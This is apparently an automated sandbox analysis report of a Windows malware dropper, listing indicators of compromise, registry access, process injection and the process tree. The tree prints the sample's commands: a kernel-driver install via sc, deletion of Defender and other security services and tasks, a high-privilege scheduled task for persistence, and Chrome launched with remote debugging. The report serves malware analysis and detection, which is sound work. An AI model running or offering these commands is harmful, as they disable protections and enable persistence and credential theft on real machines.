\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 563e9e5edc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language c42b585dc6.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage c42b585dc6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c42b585dc6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 49d4f8aa60.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WLbfHbp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3e34f7cf67.exe -
Checks processor information in registry 2 TTPs 24 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 4484 timeout.exe 6852 timeout.exe 3116 timeout.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 5324 taskkill.exe 3472 taskkill.exe 7032 taskkill.exe 7144 taskkill.exe 3572 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133875332302605388" msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1279544337-3716153908-718418795-1000\{BD1469FC-6C58-4130-93B9-D5669D3409B2} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 312 schtasks.exe 6124 schtasks.exe 5664 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3076 FjbTOQC.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5672 c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe 5672 c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe 4064 rapes.exe 4064 rapes.exe 3756 rapes.exe 3756 rapes.exe 2272 MSBuild.exe 2272 MSBuild.exe 2272 MSBuild.exe 2272 MSBuild.exe 4380 MSBuild.exe 4380 MSBuild.exe 3464 powershell.exe 3464 powershell.exe 4380 MSBuild.exe 4380 MSBuild.exe 3464 powershell.exe 3088 chrome.exe 3088 chrome.exe 5484 TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE 5484 TempZN9H2EWPPWIJPIP7WZNHNSGJRMLNZA9H.EXE 6084 powershell.exe 6084 powershell.exe 6084 powershell.exe 3504 powershell.exe 3504 powershell.exe 3504 powershell.exe 4380 MSBuild.exe 4380 MSBuild.exe 5604 MSBuild.exe 5604 MSBuild.exe 5604 MSBuild.exe 5604 MSBuild.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 4380 MSBuild.exe 4380 MSBuild.exe 5912 powershell.exe 5912 powershell.exe 5912 powershell.exe 5912 powershell.exe 4456 108394fe3e.exe 4456 108394fe3e.exe 4456 108394fe3e.exe 4456 108394fe3e.exe 4456 108394fe3e.exe 4456 108394fe3e.exe 6428 563e9e5edc.exe 6428 563e9e5edc.exe 6876 483d2fa8a0d53818306efeb32d3.exe 6876 483d2fa8a0d53818306efeb32d3.exe 4380 MSBuild.exe 4380 MSBuild.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 4460 ad8094dd16.exe 4460 ad8094dd16.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 4460 ad8094dd16.exe 4460 ad8094dd16.exe 4460 ad8094dd16.exe 2660 rapes.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 656 Process not Found 656 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 5068 msedge.exe 5068 msedge.exe 7124 msedge.exe 7124 msedge.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
description pid Process Token: SeDebugPrivilege 3076 FjbTOQC.exe Token: SeDebugPrivilege 1680 MsWin32tart.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeShutdownPrivilege 3088 chrome.exe Token: SeCreatePagefilePrivilege 3088 chrome.exe Token: SeShutdownPrivilege 3088 chrome.exe Token: SeCreatePagefilePrivilege 3088 chrome.exe Token: SeShutdownPrivilege 3088 chrome.exe Token: SeCreatePagefilePrivilege 3088 chrome.exe Token: SeShutdownPrivilege 3088 chrome.exe Token: SeCreatePagefilePrivilege 3088 chrome.exe Token: SeDebugPrivilege 6084 powershell.exe Token: SeShutdownPrivilege 3088 chrome.exe Token: SeCreatePagefilePrivilege 3088 chrome.exe Token: SeShutdownPrivilege 3088 chrome.exe Token: SeCreatePagefilePrivilege 3088 chrome.exe Token: SeDebugPrivilege 3504 powershell.exe Token: SeShutdownPrivilege 3088 chrome.exe Token: SeCreatePagefilePrivilege 3088 chrome.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 5912 powershell.exe Token: SeDebugPrivilege 7032 taskkill.exe Token: SeDebugPrivilege 7144 taskkill.exe Token: SeDebugPrivilege 3572 taskkill.exe Token: SeDebugPrivilege 5324 taskkill.exe Token: SeDebugPrivilege 3472 taskkill.exe Token: SeDebugPrivilege 6116 firefox.exe Token: SeDebugPrivilege 6116 firefox.exe Token: SeDebugPrivilege 4460 ad8094dd16.exe Token: SeDebugPrivilege 5764 MsWin32tart.exe -
Suspicious use of FindShellTrayWindow 63 IoCs
pid Process 5672 c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe 2580 3e34f7cf67.exe 2580 3e34f7cf67.exe 2580 3e34f7cf67.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 3088 chrome.exe 5068 msedge.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6116 firefox.exe 6880 c42b585dc6.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6880 c42b585dc6.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6116 firefox.exe 7124 msedge.exe -
Suspicious use of SendNotifyMessage 28 IoCs
pid Process 2580 3e34f7cf67.exe 2580 3e34f7cf67.exe 2580 3e34f7cf67.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6880 c42b585dc6.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6116 firefox.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe 6880 c42b585dc6.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 6116 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5672 wrote to memory of 4064 5672 c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe 88 PID 5672 wrote to memory of 4064 5672 c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe 88 PID 5672 wrote to memory of 4064 5672 c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe 88 PID 4064 wrote to memory of 224 4064 rapes.exe 96 PID 4064 wrote to memory of 224 4064 rapes.exe 96 PID 4064 wrote to memory of 224 4064 rapes.exe 96 PID 4064 wrote to memory of 2636 4064 rapes.exe 98 PID 4064 wrote to memory of 2636 4064 rapes.exe 98 PID 4064 wrote to memory of 2636 4064 rapes.exe 98 PID 2636 wrote to memory of 5536 2636 apple.exe 99 PID 2636 wrote to memory of 5536 2636 apple.exe 99 PID 2636 wrote to memory of 5536 2636 apple.exe 99 PID 5536 wrote to memory of 3492 5536 22.exe 101 PID 5536 wrote to memory of 3492 5536 22.exe 101 PID 3492 wrote to memory of 1672 3492 cmd.exe 103 PID 3492 wrote to memory of 1672 3492 cmd.exe 103 PID 3492 wrote to memory of 1672 3492 cmd.exe 103 PID 1672 wrote to memory of 3080 1672 22.exe 104 PID 1672 wrote to memory of 3080 1672 22.exe 104 PID 3080 wrote to memory of 5628 3080 cmd.exe 106 PID 3080 wrote to memory of 5628 3080 cmd.exe 106 PID 3080 wrote to memory of 5928 3080 cmd.exe 107 PID 3080 wrote to memory of 5928 3080 cmd.exe 107 PID 3080 wrote to memory of 3116 3080 cmd.exe 108 PID 3080 wrote to memory of 3116 3080 cmd.exe 108 PID 3080 wrote to memory of 1948 3080 cmd.exe 109 PID 3080 wrote to memory of 1948 3080 cmd.exe 109 PID 3080 wrote to memory of 2936 3080 cmd.exe 110 PID 3080 wrote to memory of 2936 3080 cmd.exe 110 PID 3080 wrote to memory of 4092 3080 cmd.exe 111 PID 3080 wrote to memory of 4092 3080 cmd.exe 111 PID 3080 wrote to memory of 3484 3080 cmd.exe 112 PID 3080 wrote to memory of 3484 3080 cmd.exe 112 PID 3080 wrote to memory of 5196 3080 cmd.exe 113 PID 3080 wrote to memory of 5196 3080 cmd.exe 113 PID 3080 wrote to memory of 2908 3080 cmd.exe 114 PID 3080 wrote to memory of 2908 3080 cmd.exe 114 PID 3080 wrote to memory of 3352 3080 cmd.exe 115 PID 3080 wrote to memory of 3352 3080 cmd.exe 115 PID 3080 wrote to memory of 4608 3080 cmd.exe 116 PID 3080 wrote to memory of 4608 3080 cmd.exe 116 PID 3080 wrote to memory of 5268 3080 cmd.exe 117 PID 3080 wrote to memory of 5268 3080 cmd.exe 117 PID 3080 wrote to memory of 5996 3080 cmd.exe 118 PID 3080 wrote to memory of 5996 3080 cmd.exe 118 PID 3080 wrote to memory of 5868 3080 cmd.exe 119 PID 3080 wrote to memory of 5868 3080 cmd.exe 119 PID 3080 wrote to memory of 2448 3080 cmd.exe 120 PID 3080 wrote to memory of 2448 3080 cmd.exe 120 PID 3080 wrote to memory of 5084 3080 cmd.exe 121 PID 3080 wrote to memory of 5084 3080 cmd.exe 121 PID 3080 wrote to memory of 4220 3080 cmd.exe 122 PID 3080 wrote to memory of 4220 3080 cmd.exe 122 PID 3080 wrote to memory of 5724 3080 cmd.exe 123 PID 3080 wrote to memory of 5724 3080 cmd.exe 123 PID 3080 wrote to memory of 4808 3080 cmd.exe 124 PID 3080 wrote to memory of 4808 3080 cmd.exe 124 PID 3080 wrote to memory of 5720 3080 cmd.exe 125 PID 3080 wrote to memory of 5720 3080 cmd.exe 125 PID 3080 wrote to memory of 736 3080 cmd.exe 126 PID 3080 wrote to memory of 736 3080 cmd.exe 126 PID 3080 wrote to memory of 3656 3080 cmd.exe 127 PID 3080 wrote to memory of 3656 3080 cmd.exe 127 PID 3080 wrote to memory of 5800 3080 cmd.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe"C:\Users\Admin\AppData\Local\Temp\c6d53119ad485eb2f814e3a70307deba2e9b9a7635a774256a03cecbfff6f13e.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5672 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe"C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:224
-
-
C:\Users\Admin\AppData\Local\Temp\10345050101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10345050101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5536 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B834.tmp\B835.tmp\B836.bat C:\Users\Admin\AppData\Local\Temp\22.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B9F9.tmp\B9FA.tmp\B9FB.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"7⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:5628
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:5928
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:3116
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:1948
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:2936
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4092
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3484
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:5196
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:2908
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:3352
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:4608
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:5268
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:5996
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:5868
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:2448
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:5084
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:4220
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:5724
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:4808
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:5720
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:736
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
PID:3656
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:5800
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:972
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:5528
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:1920
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:1020
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:1028
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:3976
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:4308
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:4200
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:1812
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:3308
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:752
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:5016
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:2788
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:6008
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:6068
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:3188
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:6028
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:5936
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:6084
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:5144
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:2248
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:3984
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:464
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:6056
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:4548
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:916
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:1456
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:4240
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:2220
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:5136
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:4612
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:4224
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:2184
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:4276
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:544
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:5264
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:5732
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1772 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2272
-
-
-
C:\Users\Admin\AppData\Local\Temp\10346230101\FjbTOQC.exe"C:\Users\Admin\AppData\Local\Temp\10346230101\FjbTOQC.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:3076 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MsWin32tart" /tr "C:\Users\Admin\AppData\Roaming\MsWin32tart.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:312
-
-
-
C:\Users\Admin\AppData\Local\Temp\10347640101\q4jfn3p.exe"C:\Users\Admin\AppData\Local\Temp\10347640101\q4jfn3p.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4904 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4380 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3088 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff82fc6dcf8,0x7ff82fc6dd04,0x7ff82fc6dd106⤵PID:1992
-
-
